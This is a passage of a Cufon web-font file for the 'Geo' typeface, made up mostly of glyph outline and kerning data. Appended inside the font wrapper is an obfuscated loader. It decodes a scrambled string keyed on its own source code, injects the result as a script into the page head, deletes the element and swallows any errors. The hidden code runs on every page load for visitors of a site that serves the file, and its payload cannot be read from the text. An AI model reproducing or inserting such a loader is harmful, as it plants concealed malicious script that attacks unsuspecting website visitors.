0r0,-36v-35,-3,-68,-17,-81,-45r13,-5v11,21,38,33,68,36r0,-114v-40,-9,-80,-19,-78,-67v1,-39,38,-60,78,-63r0,-36r10,0r0,36v37,1,65,13,78,40v-5,3,-7,3,-12,5xm174,-64v4,-46,-30,-53,-69,-61r0,112v35,-3,66,-21,69,-51","w":204},{"d":"89,-271r0,12v-43,-8,-29,47,-29,83v0,41,-13,59,-22,63v5,4,22,15,22,63v0,33,-17,87,29,81r0,13v-80,14,-11,-130,-67,-151r0,-11v32,-7,25,-70,25,-111v0,-30,9,-45,42,-42","w":103},{"d":"25,-13v0,-8,6,-13,14,-13v8,0,13,5,13,13v0,8,-5,14,-13,14v-8,0,-14,-6,-14,-14","w":78},{"d":"28,0r0,-255r13,0r0,85v48,-26,121,-15,121,44r0,126r-13,0r0,-126v-3,-52,-66,-50,-108,-33r0,159r-13,0","w":190,"k":{"y":4,"a":8,"Y":22,"x":4,"v":4,"t":4,"l":4,"g":4,"V":19,"T":34,"S":8}},{"d":"22,-186r63,178r62,-178r14,0r-67,189r-19,0r-67,-189r14,0","w":168,"k":{"o":4,"e":4,"c":4,"a":9,"A":12,"d":4,"T":15,"G":-12,".":27,",":27}},{"d":"95,-15r-4,-3r0,16v-32,-1,-63,-20,-63,-57r0,-192r13,0r0,68r40,0r0,13r-40,0r0,111v0,31,28,44,54,44","w":99,"k":{"i":-4,"z":-11,"j":-7,"h":-8,"Z":-15}},{"d":"59,-255r-18,69r-19,0r24,-69r13,0xm105,-255r-18,69r-19,0r23,-69r14,0","w":123},{"d":"157,-178r0,243r-13,0r0,-75v-48,26,-122,13,-122,-45r0,-78v3,-65,83,-66,135,-45xm144,-25r0,-144v-45,-13,-108,-13,-108,35r0,79v3,52,69,52,108,30","k":{"Y":19,"j":-4,"V":8,"T":22}},{"d":"14,-101r0,-14r102,0r0,14r-102,0","w":129},{"d":"24,-36r13,-6v29,49,145,42,146,-25r0,-63v-51,61,-174,38,-167,-58v6,-94,181,-93,181,0r0,121v0,82,-141,94,-173,31xm105,-244v-46,1,-75,23,-75,76v0,38,36,57,75,57v46,-1,78,-21,78,-76v0,-39,-39,-57,-78,-57","w":219,"k":{"7":11}},{"d":"145,-255r18,0r0,173r21,0r0,12r-21,0r0,70r-14,0r0,-70r-137,0r-8,-12xm20,-82r129,0r1,-158","w":193,"k":{"5":-8}},{"d":"20,-71r0,-113v0,-85,141,-98,175,-33v-5,3,-7,4,-12,6v-30,-51,-149,-43,-149,27r0,113v1,70,119,78,149,27v5,3,7,4,12,6v-35,64,-174,53,-175,-33","w":207,"k":{"y":4,"u":8,"w":15,"v":15,"r":4,"m":4,"j":-4}},{"d":"170,1r-42,-179r-43,179r-21,0r-56,-187r14,0r53,180r43,-180r20,0r44,180r53,-180r13,0r-56,187r-22,0","w":256,"k":{"o":4,"c":4,"a":11,"A":7,"r":7,"j":4,"g":4,"d":8,"T":22,"J":7,".":20,",":20}},{"d":"7,-241r0,-14r184,0r0,14r-85,0r0,241r-14,0r0,-241r-85,0","w":198,"k":{"y":34,"u":34,"s":34,"o":33,"i":4,"e":34,"c":40,"a":37,"A":34,"z":26,"x":26,"w":34,"v":23,"r":37,"q":38,"p":37,"n":37,"m":37,"l":8,"k":8,"j":8,"h":8,"g":37,"f":11,"d":34,"b":4,"Q":11,"O":12,"L":11,"K":11,"J":30,";":40,":":40,".":40,"-":46,",":40}},{"d":"244,-161r-59,0r-18,65r66,0v-1,5,-2,7,-3,12r-68,0v-7,26,-17,58,-24,84r-13,0r24,-84r-67,0v-7,26,-17,58,-24,84r-14,0r25,-84r-57,0r2,-12r59,0r19,-65r-66,0r3,-13r67,0r24,-81r14,0r-25,81r67,0r24,-81r14,0r-24,81r58,0xm153,-96r19,-65r-67,0r-19,65r67,0","w":257},{"d":"31,-171r0,-16r119,71r0,13r-119,71r0,-15r107,-62","w":172},{"d":"146,-255r13,0r0,247v-54,18,-135,19,-135,-46r0,-78v2,-59,73,-69,122,-45r0,-78xm146,-18r0,-146v-41,-19,-109,-20,-109,32r0,78v2,51,65,50,109,36","w":183,"k":{"v":4}},{"d":"17,-39r13,-6v33,56,152,40,145,-44v-6,-67,-92,-75,-143,-46r-7,0r0,-116r150,0r0,14r-136,0r0,84v68,-30,153,-9,150,78v-3,86,-135,104,-172,36","w":208,"k":{"9":11,"7":11,"6":8,"1":15}},{"d":"19,46r22,-66r17,0v-9,26,-17,40,-26,66r-13,0","w":87},{"d":"72,-278r11,8v-58,84,-60,209,2,295v-4,3,-8,5,-12,7v-66,-92,-64,-220,-1,-310","w":93},{"d":"19,-72r0,-112v0,-84,140,-97,174,-33v-5,3,-7,5,-12,7v-29,-52,-148,-43,-148,26r0,112v0,79,156,81,156,0r0,-38r-78,0r0,-14r92,0r0,52v0,50,-46,75,-92,75v-46,0,-92,-25,-92,-75","w":235,"k":{"y":15,"u":11,"s":8,"o":15,"e":11,"c":11,"a":15,"Y":26,"A":19,"z":15,"x":15,"w":11,"v":15,"t":11,"r":11,"q":8,"p":8,"n":11,"m":15,"l":15,"k":8,"j":8,"h":12,"g":11,"f":15,"d":15,"b":11,"Z":15,"X":15,"W":12,"V":19,"U":11,"T":23,"S":8,"R":8,"Q":11,"P":11,"O":11,"N":15,"M":11,"L":15,"I":8,"H":11,"F":11,"E":8,"D":19,"B":11}},{"d":"8,5r107,-269r12,4r-106,269v-5,-2,-9,-3,-13,-4","w":133},{"d":"26,-186r0,-69r14,0v-2,26,-4,43,-6,69r-8,0xm59,-186r0,-69r14,0r-6,69r-8,0","w":95},{"d":"12,-39r12,-6v28,52,146,47,147,-24v0,-48,-34,-67,-85,-63r0,-13v42,2,73,-7,73,-48v-1,-62,-100,-65,-126,-23r-11,-6v30,-53,152,-48,151,29v0,20,-7,43,-32,54v35,13,44,41,44,71v-3,86,-139,94,-173,29","w":203,"k":{"2":4,"1":11}},{"d":"186,-255r0,14r-140,0r0,106r129,0r0,15r-129,0r0,106r140,0r0,14r-154,0r0,-255r154,0","w":205,"k":{"u":4,"o":8,"i":4,"e":8,"c":4,"a":5,"w":4,"v":8,"p":4,"d":7}},{"d":"83,-82v0,22,13,38,34,38v35,0,64,-53,64,-85v0,-25,-10,-40,-32,-40v-44,0,-66,51,-66,87xm202,-173r12,0v-12,38,-28,75,-37,115v0,5,2,13,12,13v26,0,61,-48,61,-89v0,-55,-49,-91,-104,-91v-69,0,-116,55,-116,117v0,74,72,136,151,112v2,4,3,6,5,9v-86,29,-168,-36,-168,-121v0,-71,56,-128,127,-128v67,0,117,44,117,102v0,57,-46,103,-79,101v-13,-1,-17,-9,-17,-28v-26,42,-95,35,-95,-20v0,-48,30,-99,79,-99v14,0,36,9,40,37v3,-6,9,-22,12,-30","w":274},{"d":"26,-69v0,44,41,61,81,61v34,0,75,-19,75,-61v-1,-52,-38,-63,-82,-62v-39,0,-74,13,-74,62xm196,-69v-1,99,-182,101,-184,0v0,-33,17,-58,49,-68v-26,-9,-37,-32,-37,-56v1,-45,39,-65,83,-65v39,0,77,22,77,65v0,21,-10,45,-36,54v32,11,48,37,48,70xm170,-193v-1,-37,-33,-52,-70,-52v-32,0,-63,17,-63,52v1,43,34,50,70,49v31,0,63,-9,63,-49","w":208,"k":{"9":8}},{"d":"163,-188v0,-61,-115,-74,-133,-17v-5,-2,-8,-4,-13,-6v23,-71,160,-55,160,24v0,20,-11,42,-31,62r-112,111r144,0r0,14r-161,0v-2,-5,-3,-8,-5,-12r124,-123v18,-17,27,-36,27,-53","w":196,"k":{"4":15}},{"d":"147,-186r13,0r0,176v-52,22,-133,20,-133,-44r0,-132r13,0r0,132v0,53,72,49,107,33r0,-165","w":186,"k":{"a":1,"Y":26,"w":4,"v":4,"V":8,"T":19}},{"d":"158,-206v1,36,-33,51,-60,67r69,70r21,-35r11,5r-23,38r42,48r-17,0r-32,-36v-21,28,-44,47,-78,47v-40,0,-72,-26,-72,-68v0,-36,28,-55,58,-73v-15,-18,-32,-38,-32,-59v-2,-67,113,-73,113,-4xm160,-58r-74,-76v-24,14,-53,31,-53,63v0,34,22,56,61,56v28,0,51,-22,66,-43xm104,-243v-24,0,-45,17,-45,41v0,20,18,39,30,53v23,-12,55,-25,55,-55v0,-23,-17,-39,-40,-39","w":219},{"d":"162,-70r0,-171r-85,0r0,-14r99,0r0,185v0,92,-154,99,-172,17v6,-1,9,-1,14,-2v16,66,143,60,144,-15","w":208,"k":{"y":8,"u":8,"o":11,"i":7,"e":4,"c":11,"a":11,"A":19,"t":11,"r":8,"q":11,"p":8,"n":4,"m":8,"l":15,"j":11,"h":4,"g":11,"d":11,"b":11,"V":8,"S":8,"O":15,"L":15,"I":8,"H":11,"G":8,"F":11,"E":12,"D":12,"C":11,"B":7}},{"d":"34,-180r10,-10r59,59r57,-57r10,9r-58,57r56,57r-9,10r-56,-57r-58,58r-10,-10r58,-57","w":201},{"d":"23,0r134,-242r-144,0r0,-13r155,0r6,12r-135,243r-16,0","w":176,"k":{"8":11,"6":15,"4":49,"3":8,"2":12,"0":8}},{"d":"195,-217r-12,6v-29,-49,-146,-43,-146,25r0,64v48,-65,172,-41,166,53v-6,95,-179,94,-180,0r0,-117v0,-82,140,-94,172,-31xm114,-12v45,-1,75,-22,75,-74v0,-38,-36,-58,-75,-58v-45,1,-77,22,-77,75v0,39,38,57,77,57","w":222},{"d":"114,-189v0,40,-21,65,-50,65v-32,0,-49,-24,-49,-66v0,-42,20,-64,49,-64v31,0,50,24,50,65xm240,-65v0,40,-21,65,-49,65v-32,0,-50,-24,-50,-66v0,-43,21,-64,50,-64v31,0,49,24,49,65xm227,-65v0,-36,-13,-52,-36,-52v-24,0,-35,16,-35,51v0,37,11,52,36,52v23,0,35,-16,35,-51xm211,-271r11,7r-179,285r-12,-8xm100,-189v0,-36,-13,-52,-36,-52v-24,0,-35,17,-35,51v0,37,11,52,35,52v24,0,36,-16,36,-51","w":261},{"d":"51,-255r0,208r-14,0r0,-208r14,0xm30,-12v0,-8,6,-14,14,-14v8,0,14,6,14,14v0,8,-6,13,-14,13v-8,0,-14,-5,-14,-13","w":97},{"d":"212,-255r-92,259r-22,0r-94,-259r16,0r89,249r88,-249r15,0","w":218,"k":{"y":8,"u":13,"s":15,"o":19,"i":8,"e":15,"c":15,"a":22,"A":26,"z":8,"r":15,"q":19,"p":15,"n":19,"m":19,"g":19,"f":12,"d":26,"S":4,"Q":8,"O":7,"L":7,"K":11,"J":30,"F":11,"C":8,";":19,":":19,".":46,"-":20,",":46}},{"d":"10,-101r0,-13r160,0r0,13r-160,0","w":180},{"d":"9,-198r54,-57r16,0r0,255r-13,0r0,-239r-48,49v-4,-3,-5,-5,-9,-8","w":112},{"d":"196,-139r-48,-103v0,35,1,85,1,120r-11,0r0,-133r16,0r48,105r47,-105r17,0r0,133r-12,0r2,-122r-49,105r-11,0xm113,-244r-47,0r0,122r-11,0r0,-122r-47,0r0,-11r105,0r0,11","w":295},{"d":"32,0r0,-255r14,0r0,149r148,-149r17,0r-119,123r119,132r-18,0r-111,-122r-36,36r0,86r-14,0","w":218,"k":{"y":8,"u":11,"o":12,"i":8,"e":11,"c":8,"a":11,"w":11,"v":15,"r":4,"q":8,"g":11,"d":8,"S":8,"Q":8,"O":11,"G":8,"C":8}},{"d":"8,-101r0,-13r315,0r0,13r-315,0","w":331},{"d":"25,-186r0,-69r14,0v-1,26,-2,43,-3,69r-11,0","w":66},{"d":"38,65r-13,0r0,-244v54,-17,135,-20,135,47r0,77v-2,58,-73,71,-122,46r0,74xm38,-168r0,146v40,18,109,19,109,-32r0,-78v-2,-52,-65,-50,-109,-36","k":{"Y":30,"j":4,"V":11,"T":34}},{"d":"42,0r-13,0r0,-176v36,-21,89,-25,118,11v38,-45,119,-28,120,34r0,131r-13,0r0,-130v4,-60,-101,-61,-101,-9r0,139r-12,0r0,-139v-1,-40,-70,-47,-99,-28r0,167","w":295,"k":{"a":4,"Y":30,"t":4,"m":4,"W":8,"V":19,"T":34,"L":8}},{"d":"60,-255r-20,69r-18,0r25,-69r13,0","w":78,"k":{"\u2018":31}},{"d":"76,-12r0,13v-32,-1,-49,-19,-49,-55r0,-201r13,0r0,201v0,27,10,42,36,42","w":83,"k":{"a":4,"A":-8,"z":-8,"w":8,"v":8,"Z":-12,"T":8}},{"d":"141,-105v15,-70,-60,-92,-101,-53v-3,-3,-5,-7,-8,-9v35,-38,122,-27,122,33r0,127v-56,19,-135,17,-134,-51v1,-61,72,-69,121,-47xm32,-58v-1,57,63,56,109,43r0,-78v-38,-16,-108,-22,-109,35","k":{"o":4,"e":5,"c":3,"a":9,"Y":22,"x":7,"w":4,"v":4,"t":5,"r":4,"q":4,"n":4,"h":4,"g":4,"d":5,"X":8,"V":15,"U":8,"T":41,"Q":8,"L":8}},{"d":"147,-161r-11,7v-23,-34,-102,-29,-102,22r0,78v0,54,87,57,105,16r12,6v-23,52,-129,47,-130,-22r0,-78v1,-65,96,-75,126,-29","w":159,"k":{"s":-4,"Y":15,"A":-4,"z":-4,"x":-4,"v":-4,"p":-4,"j":-4,"T":34,"J":-4}},{"d":"27,-242v0,-7,6,-12,13,-12v7,0,12,5,12,12v0,7,-5,13,-12,13v-7,0,-13,-6,-13,-13xm-8,66r0,-13v27,-1,41,-16,41,-45r0,-195r13,0r0,195v0,37,-21,57,-54,58","w":78,"k":{"u":4,"o":4,"a":4,"q":8,"l":8,"g":8,"T":15,"Q":8,"L":11,"D":12,"C":4}},{"d":"240,-5r2,0r70,-250r14,0r-75,258r-21,0r-64,-204r-65,204r-21,0r-74,-258r15,0r70,250r67,-213r15,0","w":332,"k":{"y":8,"u":8,"o":11,"i":4,"e":11,"c":12,"a":19,"A":23,"r":15,"q":12,"p":11,"n":11,"m":8,"j":4,"g":11,"d":19,"K":11,"J":19,";":6,":":6,".":27,",":27}},{"d":"24,-160r67,-95r13,0r70,95r-17,0r-59,-84r-57,84r-17,0","w":205},{"d":"32,0r0,-255r14,0r0,255r-14,0","w":83,"k":{"i":8,"a":8,"j":11,"d":8,"S":8}},{"d":"12,-273r112,282r-12,5r-113,-283","w":130},{"d":"242,-244r-91,205r-15,0r-91,-205r0,244r-14,0r0,-255r24,0r89,200r88,-200r24,0r0,255r-14,0r0,-244","w":286,"k":{"c":4,"a":4,"A":4,"l":7}},{"d":"19,-116r0,-14r84,0r0,-81r13,0r0,81r80,0r0,14r-80,0r0,82r-13,0r0,-82r-84,0","w":213},{"d":"33,44r8,-8v38,30,116,19,102,-47v-48,27,-120,16,-120,-43r0,-80v2,-65,82,-64,133,-43r0,185v0,62,-87,68,-123,36xm36,-54v1,51,71,53,107,30r0,-143v-34,-15,-107,-20,-107,32r0,81","w":180,"k":{"Y":19,"z":-4,"v":4,"V":12,"T":26}},{"d":"75,-272r0,12r-33,0r0,293r33,0r0,11r-47,0r0,-316r47,0","w":84},{"d":"32,-128r0,-12r139,0r0,12r-139,0xm32,-78r0,-13r139,0r0,13r-139,0","w":201},{"d":"81,-102r53,-84r16,0r-61,93r61,93r-16,0r-53,-84r-54,84r-16,0r61,-93r-61,-93r16,0","w":162,"k":{"o":4,"e":8,"c":4,"a":4,"q":4,"p":4,"l":8,"k":4,"d":4,"T":15}},{"d":"28,0r0,-255r13,0r0,175r104,-106r16,0r-81,83r81,103r-16,0r-74,-93r-30,30r0,63r-13,0","w":169,"k":{"y":4,"u":4,"o":8,"e":8,"c":8,"a":8,"Y":8,"r":4,"q":4,"l":4,"g":8,"d":8,"T":23}},{"d":"25,-71r0,-113v0,-50,48,-74,97,-74v49,0,98,24,98,74r0,113v0,50,-49,75,-98,75v-49,0,-97,-25,-97,-75xm39,-184r0,113v0,41,41,61,83,61v42,0,84,-20,84,-61r0,-113v0,-83,-167,-82,-167,0","w":245,"k":{"u":4,"a":8,"Y":15,"A":4,"z":4,"T":15}},{"d":"39,-54v2,51,72,53,108,30r0,-162r12,0r0,194v0,62,-86,68,-122,36r8,-8v38,30,116,19,102,-47v-48,27,-121,16,-121,-43r0,-132r13,0r0,132","w":186,"k":{"x":8,"v":8,"q":4,"m":-4,"j":-4,"h":-4,"T":37,".":33,",":15,"y":4,"o":3,"a":4}},{"d":"32,0r0,-255r18,0r147,237r0,-237r14,0r0,255r-20,0r-145,-233r0,233r-14,0","w":248,"k":{"u":4,"e":4,"a":8,"v":4,"l":11}},{"d":"20,38r18,-60r21,0r-25,60r-14,0xm31,-151v0,-8,5,-14,13,-14v8,0,14,6,14,14v0,8,-6,13,-14,13v-8,0,-13,-5,-13,-13","w":89},{"d":"25,-7r0,-248r13,0r0,79v48,-25,121,-15,121,44r0,76v-2,64,-79,68,-134,49xm146,-132v-2,-53,-72,-50,-108,-30r0,145v45,15,108,13,108,-38r0,-77","w":180,"k":{"a":4,"z":4,"x":4,"v":4,"W":15,"V":15,"T":34}},{"d":"7,0r93,-260r21,0r94,260r-16,0r-32,-89r-114,0r-31,89r-15,0xm58,-103r105,0r-52,-146","w":222,"k":{"z":-4,"w":12,"v":11,"t":8,"q":8,"m":4,"l":11,"k":4,"g":8,"d":5,"W":19,"V":23,"U":8,"T":34,"Q":11,"L":15,"K":8,"H":4,"G":7,"C":7,"\u2019":31}},{"d":"35,-271r13,0r0,331r-13,0r0,-331","w":82}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+266-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("Y:]rvOa@qGWNY9^jCO6Es:sWP$ar]OWNP$kEqG#_]DSuF>@h8KWqAO[8cVkQ#^W1DDgr8~zEa_a#cO]HiHk^Pmg]vE&WTh^FP*cE8K6{c9Q+CmzeFm&+Cmse8m^lk*uNq*]@P*cE8K6~+i@[aHaVD987]KcuYHC+Ureh8@DzAKkrk{Q+Cmze]K+VahcoD^gr8~zg8>6+Cmsg8~kUP*cE8KH@kV&=P*cE8KHfv:6~q^CMiDg+mi=_G>rfq@W[m~=hLPehU_aev:^@Y9shYz&9KH6:*skYU8aApL#imcDGPF]qv+CMT1oh~{^O_wQB`u=NbegE>@r$Vf[ljSW7digQpmzu+KrhU_zuvKreUOg^vOC@q9g_pGsN]h[_v*^eq*8WMV@jqGFwFh[bq>@bPh1dA_CVCreNYmSwp>Q=qGawqGDuCO6NF$WQv:gQ]DeNFOcQk9WQU_#^+VLwv:W~FP#Qv$fNq:W>C:[ovGcQYG]b+h1jqmguAEu`qi^_G$avqDrCpP&vqDrWYi1Q")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":181,"face":{"font-family":"Geo","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 4 2 2 2 3 2 2 4","ascent":"272","descent":"-88","bbox":"-8 -293 326 66","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"22","unicode-range":"U+0020-U+2122"}}));Cufon.replace("h1");Cufon.replace(".cufon_link");
